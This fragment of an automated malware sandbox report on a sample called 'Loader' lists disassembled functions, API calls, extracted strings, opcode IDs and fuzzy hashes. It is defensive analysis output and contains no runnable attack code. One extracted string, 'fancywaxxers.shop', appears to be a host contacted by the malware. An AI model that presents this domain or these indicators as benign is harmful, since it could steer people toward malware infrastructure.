                                                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 004288AC
                                                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 004289D8
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: EnvironmentExpandStrings
                                                                                      • String ID: 5F&D
                                                                                      • API String ID: 237503144-550051920
                                                                                      • Opcode ID: 2450178101af210a46ac29acc5776fcfc1c182fd7293ca4534cff93855dd2b3d
                                                                                      • Instruction ID: 942829b864b4477a1431440ad7c97e2cbeecfa58cdb7c96db8b67daf36b3e22e
                                                                                      • Opcode Fuzzy Hash: 2450178101af210a46ac29acc5776fcfc1c182fd7293ca4534cff93855dd2b3d
                                                                                      • Instruction Fuzzy Hash: 3651D3B0E003149FDB15AF7D884279EBFB1EB05310F55426DE856AB386CB754806CBDA
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: MetricsSystem
                                                                                      • String ID:
                                                                                      • API String ID: 4116985748-3916222277
                                                                                      • Opcode ID: 5643bd0e6aecd2554f9e3b6d68bc6b264b28297daebd8fea55e192c69e66519e
                                                                                      • Instruction ID: 6540d778efeaa480bd65b02ea75a31ebe7720a2386ffd2f0b102038c886136e6
                                                                                      • Opcode Fuzzy Hash: 5643bd0e6aecd2554f9e3b6d68bc6b264b28297daebd8fea55e192c69e66519e
                                                                                      • Instruction Fuzzy Hash: 9F5142B4E152189FDB40EFACD985A9DBBF0BB48300F11456DE498E7350D734A984CF96
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: a$0$B$n
                                                                                      • API String ID: 0-3818108776
                                                                                      • Opcode ID: 1c69455f04d2811836813bff9833e4a6b94c6bed12a3b97f74d6fa4f1ad27aeb
                                                                                      • Instruction ID: e7c56962ba8225a85387d30c6bec73706584ce55073d75710ad8fdf09878406d
                                                                                      • Opcode Fuzzy Hash: 1c69455f04d2811836813bff9833e4a6b94c6bed12a3b97f74d6fa4f1ad27aeb
                                                                                      • Instruction Fuzzy Hash: 739117606083918BE329CB39949137FBBD19FD6304F28C95EE0E6C7392D67DC4468B1A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Emok$i$id$<[
                                                                                      • API String ID: 0-1060111436
                                                                                      • Opcode ID: 636fb2ef520e299609ad50eb69c40d69a44c248ab5f0bdc666fc395afe69f111
                                                                                      • Instruction ID: e8a97748f47e1e087c5629266fca422ba662e75ab9ba7866f04a7d683378f64d
                                                                                      • Opcode Fuzzy Hash: 636fb2ef520e299609ad50eb69c40d69a44c248ab5f0bdc666fc395afe69f111
                                                                                      • Instruction Fuzzy Hash: FB71F76120C3869AD7158F29849176BFFE19F92244F0849BEE4D19B383D37DC90AC76A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: BM$W^$}@$hB
                                                                                      • API String ID: 0-4066442446
                                                                                      • Opcode ID: a157f5b3c626a1a5d0daf646665b0ad5072d5c35d623e62348dbbd496bcc1eb6
                                                                                      • Instruction ID: c69e33b5b6b13f380ebef868bf9dca4fba0c0c52768e9ad94a65745328aeb4d7
                                                                                      • Opcode Fuzzy Hash: a157f5b3c626a1a5d0daf646665b0ad5072d5c35d623e62348dbbd496bcc1eb6
                                                                                      • Instruction Fuzzy Hash: C171D2B5A093908BD7309F24D812BABBAF1FF82314F44496DD0C99B352EB398505C79B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 7M#O$;IIl$N$i&^
                                                                                      • API String ID: 0-3252987326
                                                                                      • Opcode ID: c61e4a4205846b215042cd9521015827774156e33b5298b1a2c466e5f44d66cc
                                                                                      • Instruction ID: 4a631b84b0715eae3dedeb3f50365bf272b00adb39823d28b56c5b2865ac7ba7
                                                                                      • Opcode Fuzzy Hash: c61e4a4205846b215042cd9521015827774156e33b5298b1a2c466e5f44d66cc
                                                                                      • Instruction Fuzzy Hash: FF51467165C3E18BDB39CF34D8A47A7BBE1DB93305F188A6DC0D987241E7394405879A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: #j"h$OL$[n$l
                                                                                      • API String ID: 0-2191688606
                                                                                      • Opcode ID: b5de5bd3023d225af82c97e92825ad8f9608416ff810a54325b0155e8319950f
                                                                                      • Instruction ID: 692cb52cecf86b0f81445490f2c7fde706d38ebd665239fbbccbf1d88a6e45c6
                                                                                      • Opcode Fuzzy Hash: b5de5bd3023d225af82c97e92825ad8f9608416ff810a54325b0155e8319950f
                                                                                      • Instruction Fuzzy Hash: 8EC102B16083208BC724CF25D85226BB7F1FFD1354F989A1DE8D65B391E7789801CB86
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $@2F$/XY^$2D7Z
                                                                                      • API String ID: 0-1638671356
                                                                                      • Opcode ID: 6460bc4e16d0ceae79147165ac20fd9eb75ae5927cbb100790d34f15c0c1f791
                                                                                      • Instruction ID: 3f2d989131493c16e15a014fbc23452fa0199cb327e821a6a5a554b8be085fb8
                                                                                      • Opcode Fuzzy Hash: 6460bc4e16d0ceae79147165ac20fd9eb75ae5927cbb100790d34f15c0c1f791
                                                                                      • Instruction Fuzzy Hash: 49C1E37AE00235CBCB24CF68E8905BEF3B2FF9A710B59815AD851AB355D7349C42CB94
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: -$-$4:;8
                                                                                      • API String ID: 0-4057297499
                                                                                      • Opcode ID: d37b3f3caa760090b3564b45e2708a532977c2e18a1fc6eeae55f7d2ee7df7f7
                                                                                      • Instruction ID: 1bf2e4dc3e7ce12b69fe8b448ded2dbe0936cd98e3b574339779db5d0e5a783a
                                                                                      • Opcode Fuzzy Hash: d37b3f3caa760090b3564b45e2708a532977c2e18a1fc6eeae55f7d2ee7df7f7
                                                                                      • Instruction Fuzzy Hash: E7A12C72B047114BC718CE29CA5025FB7D2ABC5314F198A3EE8D6E73D5EA38DD064B89
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: wt$yWN$}WN
                                                                                      • API String ID: 0-1915940971
                                                                                      • Opcode ID: 6bdd68040a2e2ae9852662caf2ee4ce4614f3b4cf4dce2968df87cbb5259b280
                                                                                      • Instruction ID: 089daf89ee7f0db082fd9313e23fc6f3e6d0e13c11ce4ebe69625a081c295134
                                                                                      • Opcode Fuzzy Hash: 6bdd68040a2e2ae9852662caf2ee4ce4614f3b4cf4dce2968df87cbb5259b280
                                                                                      • Instruction Fuzzy Hash: 378104719483008BC315DF28D8916ABB7F1EFD1354F188A2DE4D68B391E7389949C79A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: a$B$n
                                                                                      • API String ID: 0-3014070278
                                                                                      • Opcode ID: f1701767cb0356d0994a7c03961550b923cd1b588f9a6aff9983a49fcc703494
                                                                                      • Instruction ID: 49841bc018301e16c077848ed4d211fc14ac0d053d7a76b001874c689b0c75d3
                                                                                      • Opcode Fuzzy Hash: f1701767cb0356d0994a7c03961550b923cd1b588f9a6aff9983a49fcc703494
                                                                                      • Instruction Fuzzy Hash: F1812B607087914BE3298B3994A137BBBD29FD6304F28D95EE0D687392D67DC4068B16
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: a$B$n
                                                                                      • API String ID: 0-3014070278
                                                                                      • Opcode ID: c96437ffd9268ad0ff8f0a1475bac5c27009e2e2cbb204feb9f937d36529813f
                                                                                      • Instruction ID: 4aa6cdd8ae70eefb2bf7a67cdb70843991bbf1ea8783939d09c5b7daef4c1f10
                                                                                      • Opcode Fuzzy Hash: c96437ffd9268ad0ff8f0a1475bac5c27009e2e2cbb204feb9f937d36529813f
                                                                                      • Instruction Fuzzy Hash: FC614B606087914BD3298B3994A137BBFD29FD7304F2C895EE0E187392D67DC4068B1A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 7M#O$;IIl$i&^
                                                                                      • API String ID: 0-3185523662
                                                                                      • Opcode ID: 34069afb0347a74477ad04a984a268cff8684b49854ef51d451906b44207a9e6
                                                                                      • Instruction ID: 6444974f794a8428d10943ae3a2cddf0c3cfa6b6cd36afac276795c35f9e6a41
                                                                                      • Opcode Fuzzy Hash: 34069afb0347a74477ad04a984a268cff8684b49854ef51d451906b44207a9e6
                                                                                      • Instruction Fuzzy Hash: B241257061C3D18BD7398F3498647A7BBE0DF93305F18996DC0D98B241D7394406875B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 'b3$+b3$Sfgd
                                                                                      • API String ID: 0-3891617458
                                                                                      • Opcode ID: 7ffac7a282f90fc876f362e72916d8f450f66741c57a432dee5775e1900f54b4
                                                                                      • Instruction ID: 010758c92db876e053e9612d3ae0437862503539a69f98fc056ac5463bccddf7
                                                                                      • Opcode Fuzzy Hash: 7ffac7a282f90fc876f362e72916d8f450f66741c57a432dee5775e1900f54b4
                                                                                      • Instruction Fuzzy Hash: 564127716093805BD7148F34EC917ABBFE29BD2314F58595DB1D1CB3C1C2B984468756
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: |b
                                                                                      • API String ID: 0-3243303498
                                                                                      • Opcode ID: 7caf0db29139c641b50f00f3aab5da779ecf9885a3c08816b05e7dd811f086b8
                                                                                      • Instruction ID: 05f5ef6facea21cb82f5acc030affcfdcc42ffba72c346cc67803f24ea77f2d3
                                                                                      • Opcode Fuzzy Hash: 7caf0db29139c641b50f00f3aab5da779ecf9885a3c08816b05e7dd811f086b8
                                                                                      • Instruction Fuzzy Hash: 69A1D275610712CFD724CF29C8D06A7B7F2FF9A320B14856EC89A8BB55D738A891CB14
                                                                                      APIs
                                                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 00417A23
                                                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 00417D87
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: EnvironmentExpandStrings
                                                                                      • String ID:
                                                                                      • API String ID: 237503144-0
                                                                                      • Opcode ID: 622078f7da562363e446ea3e970d8b237016041d41d743a338e7a00e853970a0
                                                                                      • Instruction ID: ec4e9609bf106e6f5cd8a470f3275a2f47c11ebd4f086a658abb49051a94d593
                                                                                      • Opcode Fuzzy Hash: 622078f7da562363e446ea3e970d8b237016041d41d743a338e7a00e853970a0
                                                                                      • Instruction Fuzzy Hash: FD1254716487028BC324CF29C8D16A3B3F2FF89710B29865ED4964F765D778B892CB94
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: "kB$t
                                                                                      • API String ID: 0-1728843117
                                                                                      • Opcode ID: cdde512ba4708586670250d8791409b53f330cb7032e7a92a45b48eba7e66bce
                                                                                      • Instruction ID: 47c6aa30723dd5f274a344fa33dc3fc7f1f1c18c7e037d66fbdd50b943802691
                                                                                      • Opcode Fuzzy Hash: cdde512ba4708586670250d8791409b53f330cb7032e7a92a45b48eba7e66bce
                                                                                      • Instruction Fuzzy Hash: 7FC159B6A087258FC714CF29D85172BB7E1ABC5314F4A867DE8569B382DB34EC04C785
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: kA$iA
                                                                                      • API String ID: 0-13619556
                                                                                      • Opcode ID: 7268e208af3af03dc4c1aa162b083f1da454d2121a82605a67f71c80f16feb18
                                                                                      • Instruction ID: d1753e7b848df1d51992a2657fb609d95ddb37c92f3721196934cc3551250237
                                                                                      • Opcode Fuzzy Hash: 7268e208af3af03dc4c1aa162b083f1da454d2121a82605a67f71c80f16feb18
                                                                                      • Instruction Fuzzy Hash: 5881F374604B418FD3218F29C8917A3BBE1EF57314F1988ADD0968B362D739E882CB58
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: -Fjt$ranx
                                                                                      • API String ID: 0-3706853807
                                                                                      • Opcode ID: 4f8fe68a00adccb6cdfe4be809a591fbed372a59942045499198af0bf16da8bc
                                                                                      • Instruction ID: 24952530908f65497321946440fed833d77024a3e82a06578cd4427b5e6e1e38
                                                                                      • Opcode Fuzzy Hash: 4f8fe68a00adccb6cdfe4be809a591fbed372a59942045499198af0bf16da8bc
                                                                                      • Instruction Fuzzy Hash: 9E41E42460C3E04BDB3A8F3994603FBBFE19B97301F9859ADC4D99B686CB384105875B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: -Fjt$ranx
                                                                                      • API String ID: 0-3706853807
                                                                                      • Opcode ID: a80aa053ab455487de130884ea2b8acc1ee1e1da66588ba42998374e5e4f1ec8
                                                                                      • Instruction ID: 472c3e6aea44b2ae6de83ff281cb0e7241e96f3d355f0238d3ce23440a49d637
                                                                                      • Opcode Fuzzy Hash: a80aa053ab455487de130884ea2b8acc1ee1e1da66588ba42998374e5e4f1ec8
                                                                                      • Instruction Fuzzy Hash: 1641E52450D3E04BD73A8F3694603FBBBE29B97300F9855EDC4DA9B286CB384505875B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: -Fjt$ranx
                                                                                      • API String ID: 0-3706853807
                                                                                      • Opcode ID: c7d768e7c4b6b7a0381b46c6372e41e19c89c5568f0ddac61edabaf0c55406ad
                                                                                      • Instruction ID: fb358834279bd8eddcd78f03b7afd8e35b8a2d174f1375a2efeb29d4e8d599a3
                                                                                      • Opcode Fuzzy Hash: c7d768e7c4b6b7a0381b46c6372e41e19c89c5568f0ddac61edabaf0c55406ad
                                                                                      • Instruction Fuzzy Hash: 7D31BE3460C7E04BDB3A8F3990647FBBBE19B97300F8859ADC4C99B286CB384105875B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: fancywaxxers.shop
                                                                                      • API String ID: 0-444537838
                                                                                      • Opcode ID: e203da8322157a9b3956b29bd662beb12299b207ee357b6b575edbf40509aee7
                                                                                      • Instruction ID: dafd18983c516955866d33b4970a3e1e6c9f0e3e02dd9dad57416d2a7bd3f698
                                                                                      • Opcode Fuzzy Hash: e203da8322157a9b3956b29bd662beb12299b207ee357b6b575edbf40509aee7
                                                                                      • Instruction Fuzzy Hash: C1620475A00211DFDB14CF68E89076EBBB1FF8A314F2985A8D851AB385D739DC42CB94
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID: f
                                                                                      • API String ID: 2994545307-1993550816
                                                                                      • Opcode ID: f4361a5e05927ae4e0df808eb1b642d6f5767c4dfe251d9b1f2289b89ea06719
                                                                                      • Instruction ID: c33d86b22e1400fff916a03cdee2221440874a16c3fbb5b38faa73608c97bcf9
                                                                                      • Opcode Fuzzy Hash: f4361a5e05927ae4e0df808eb1b642d6f5767c4dfe251d9b1f2289b89ea06719
                                                                                      • Instruction Fuzzy Hash: 412203756083518FD714CF14C890B2BBBE1EBC9318F249A6DE6D19B392DB34DC068B96
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: "
                                                                                      • API String ID: 0-123907689
                                                                                      • Opcode ID: 90733bcd458bcf252aae366c99aa490be20388b351ed62b1cec3ea6397516193
                                                                                      • Instruction ID: a3c633c92631b29df2efd19671c2f159069926fcaeca37eed059615b3ca2587d
                                                                                      • Opcode Fuzzy Hash: 90733bcd458bcf252aae366c99aa490be20388b351ed62b1cec3ea6397516193
                                                                                      • Instruction Fuzzy Hash: 16C137B2B083215BD714CE25E490B6BB7D9AB80314F99852FE8958B381D73CDC45C786
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Dp;3
                                                                                      • API String ID: 0-3802265096
                                                                                      • Opcode ID: 62bef077b4a7ad9e374660af09ab2e7b5df4ce128b8c67e5d6b41e11b301da58
                                                                                      • Instruction ID: a4dd3258917c1a95df17782d86d4cc0690ee59a16ad6037e4107dddc21cf1de1
                                                                                      • Opcode Fuzzy Hash: 62bef077b4a7ad9e374660af09ab2e7b5df4ce128b8c67e5d6b41e11b301da58
                                                                                      • Instruction Fuzzy Hash: 27417B6960D3E09BD7328F2699A13A77FE0AF53304F58459EE8D60F342C6390805CB47
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: D]+\
                                                                                      • API String ID: 0-1174097187
                                                                                      • Opcode ID: cc300d77c422ace61d4dd7053792f1d8f38841c0bf0979bc824747d0769fed66
                                                                                      • Instruction ID: 8f8c42cdc26bdad118407bd0d98e6ed8b9cc0277e4995d14ea8303c8ad09f1f6
                                                                                      • Opcode Fuzzy Hash: cc300d77c422ace61d4dd7053792f1d8f38841c0bf0979bc824747d0769fed66
                                                                                      • Instruction Fuzzy Hash: 453109756082504FD718DF28E4E157B77D2EB9B314F29A53DC1D2A7362DB38A8078709
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID: @
                                                                                      • API String ID: 2994545307-2766056989
                                                                                      • Opcode ID: 81f9ae2914819c9c6a4410cae77277031c58655e59832871c0f1fadb17f4dbf4
                                                                                      • Instruction ID: ca9191f9888936783b5f0eccb76d409f6ca614e4fe7f5753b4ce0656cf767deb
                                                                                      • Opcode Fuzzy Hash: 81f9ae2914819c9c6a4410cae77277031c58655e59832871c0f1fadb17f4dbf4
                                                                                      • Instruction Fuzzy Hash: 7021D0759093009FD300DF29D880B6BB7F5EFCA324F15A92DE98887391D37598458B6A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: D]+\
                                                                                      • API String ID: 0-1174097187
                                                                                      • Opcode ID: 4aac1d872fe0a31d056a86b1e952031f914278e7a716198897039617ffadf456
                                                                                      • Instruction ID: db133fbd9df054914d5c69314d1d642f36b626c8333fb52ef00424c154900c12
                                                                                      • Opcode Fuzzy Hash: 4aac1d872fe0a31d056a86b1e952031f914278e7a716198897039617ffadf456
                                                                                      • Instruction Fuzzy Hash: 8E1196786082518FD758DF18E4E153B77A2EB9B314F24A63DC59267352DB39A803CB0D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: XQ8x
                                                                                      • API String ID: 0-197327139
                                                                                      • Opcode ID: 5da76e0350450f83c8c078b5943be188d79dc2c951275914ccfebef2adf8ee52
                                                                                      • Instruction ID: 9c2af5fd4b9cf7f25f4acdf8297bbeb475532b051bf47ed240600f127e256e41
                                                                                      • Opcode Fuzzy Hash: 5da76e0350450f83c8c078b5943be188d79dc2c951275914ccfebef2adf8ee52
                                                                                      • Instruction Fuzzy Hash: F911AD302083818ADB04CF3898647BBBFE29B87314F596D6DE0D2972D2C739C6458B5A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: vuvw
                                                                                      • API String ID: 0-2318315528
                                                                                      • Opcode ID: 6a7389962629d418bac17aa10ac7f3b44be1de6f7ac03bf822bf71bb63e337b6
                                                                                      • Instruction ID: 7b8d81f586c8c5d18aa4adc5cb2c574870acd49ceab22145c3efc2afe8c16204
                                                                                      • Opcode Fuzzy Hash: 6a7389962629d418bac17aa10ac7f3b44be1de6f7ac03bf822bf71bb63e337b6
                                                                                      • Instruction Fuzzy Hash: 10012636F687114FC3088B38DC8512AA6D3A7C5214F08E57EAA91D7359DD38CC028748
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: eda36f71eba9765271182112f1f3655c34cc5f944bc2088baf291ead026e868a
                                                                                      • Instruction ID: b9bab592eefbaf0617e858a3476857c393d6668e6cf7162cb5b7fb8d5f027c76
                                                                                      • Opcode Fuzzy Hash: eda36f71eba9765271182112f1f3655c34cc5f944bc2088baf291ead026e868a
                                                                                      • Instruction Fuzzy Hash: 6C22A371A087118BC725DE18D9806ABB3E1BFC4319F19893ED9C6A7385D738B851CB87
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5ffa6d6d865be4018f470b13d09fec5e7fd03df750cb331b1b1c991303f8594d
                                                                                      • Instruction ID: 73ccf1c197bf7d9fa2a33f8f6a4c8263e1d0733264a234c266ccdc27ce0caf72
                                                                                      • Opcode Fuzzy Hash: 5ffa6d6d865be4018f470b13d09fec5e7fd03df750cb331b1b1c991303f8594d
                                                                                      • Instruction Fuzzy Hash: 55F1BD356087418FD724CF29C88166BFBE2EFD9304F08882EE4D997791E679E844CB56
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
